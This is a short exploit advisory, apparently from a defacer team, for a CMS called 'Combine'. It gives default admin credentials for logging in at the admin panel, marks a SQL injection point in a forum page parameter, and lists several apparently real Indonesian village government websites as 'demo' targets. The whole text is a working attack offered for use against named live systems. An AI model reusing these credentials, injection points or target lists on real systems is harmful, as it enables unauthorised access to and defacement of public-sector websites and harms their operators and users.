[+]Exploit Title: CMS Combine Mutiple Vulnerability
[+]Author: ./Sn00py
[+]Team: N45HT
[+]Goolge Dork: N/A
[+]Tested on: Windows 10 pro
[+]Vendor: http://combine.or.id/
=======================================
[+]Proof Of Concept:
Dorking in google
[+]Bypass Admin Login
http://127.0.0.1/siteman
User/Passwd:admin/admin or admin/sid304
[+]SQL Injection
http://www.taman.desa.id/hp/lihatforum.php?id=7'<Inject Here
[+]Vuln? You redirected to dashboard
[+]Demo
http://karangduwet-paliyan.desa.id/siteman
http://karangtengah-wonosari.desa.id/siteman
http://duwet-wonosari.desa.id/siteman
http://www.tegalrejo-gedangsari.desa.id/siteman
=======================================
Greetz:Shinchan - ZEROONE-04 - ZakirDotID - RSFLT - N45HT - AllindonesiaDefacer